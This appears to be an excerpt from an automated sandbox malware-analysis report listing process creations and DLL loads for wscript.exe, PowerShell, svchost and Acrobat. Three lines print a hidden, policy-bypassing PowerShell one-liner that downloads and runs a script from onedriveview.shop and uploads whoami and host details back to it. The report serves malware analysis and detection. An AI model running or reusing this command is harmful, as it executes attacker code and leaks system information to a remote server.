              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
